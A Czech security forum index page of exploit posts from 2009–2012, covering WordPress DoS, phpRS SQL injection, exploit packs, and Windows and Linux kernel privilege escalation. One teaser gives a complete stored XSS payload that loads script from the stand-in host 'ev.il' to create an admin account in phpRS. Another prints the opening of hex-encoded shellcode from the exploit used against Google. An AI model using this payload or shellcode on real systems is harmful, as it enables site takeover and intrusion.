Exploit
Zdrojové kódy zajímavých exploitů
WordPress obsahuje závažnou chybu umožňující DoS
Vložil/a RubberDuck, 21 Říjen, 2009 - 10:25
Před pár dny se objevila advisorka popisující závažnou bezpečnostní chybu v CMS WordPress umožňující utoč DoS útok na server a jeho následné vytížení a nedostupnost.
Zdroj:
phpRS 2.8.2 RC v5 Multiple SQL injections
Vložil/a RubberDuck, 5 Listopad, 2012 - 11:17
V poslední verzi českého redakčního systému phpRS se nachází několik SQL injekcí.
Seznamte se - exploitpack
Vložil/a RubberDuck, 14 Září, 2012 - 15:53
"Webové stránky významné společnosti XYZ servírovaly návštěvníkům java exploity z nechvalně známého exploitpacku Blackhole". Přesně takové zprávy zdobí prakticky denně titulní stránky zpravodajských serverů zaměřených na bezpečnost. Co to ale exploitpack přesně je? A kde se vzal? Přesně tuto otázku má za úkol zodpovědět následující článek.
phpRS 2.8.1a XSRF POC EXPLOIT
Vložil/a 4194, 29 Leden, 2010 - 12:20
PHPRS 2.8.1A XSRF POC EXPLOIT
VULN: REGISTRATION (readers.php), INPUTS ‘rcelejmeno’ && ‘rmail’
VALUE: “-</td><script src=http://ev.il/xpl.js />”
AUTHOR: 4194
EXPLOIT_DESCRIPTION: creating new admin account
Exploit použitý k útoku na korporátní síť Googlu
Vložil/a cm3l1k1, 28 Leden, 2010 - 17:48
UPDATE
<html><script>
var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
Chyba zneužitelná od Windows NT 3.1 až po Windows 7 (Ring 0 Escalation Vulnerability)
Vložil/a cm3l1k1, 21 Leden, 2010 - 13:58
Na Internetu se objevil exploit umožňující eskalaci oprávnění díky kódu, který je ve Windows od roku 1993.
Twitter pod útokem iránských hackerů
Vložil/a infinity, 18 Prosinec, 2009 - 17:36
... na Twitter byly během včerejšího dne vedeny hackerské útoky, ke kterým se přihlásila skupina „Iranian Cyber Army“ (Íránská kyberarmáda).
Linux Kernel 2.x sock_sendpage()
Vložil/a czYber ph0enix, 15 Srpen, 2009 - 11:43
A máme tu další lokální exploit pro Linux.
Linux 2.6.30+ Local Kernel Exploit 0day - disabling SELinux, AppArmor and LSM
Vložil/a cm3l1k1, 11 Srpen, 2009 - 17:29
jj asi bude Grsecurity dobrá volba :o)
Souhrn Cisco IOS zranitelností
Vložil/a cm3l1k1, 27 Duben, 2009 - 16:39
Cisco vydalo souhrn osmi zranitelností v IOS software, ke kterým přidalo popis chyby a metodu prevence/opatchování.
Individual publication links are listed below:
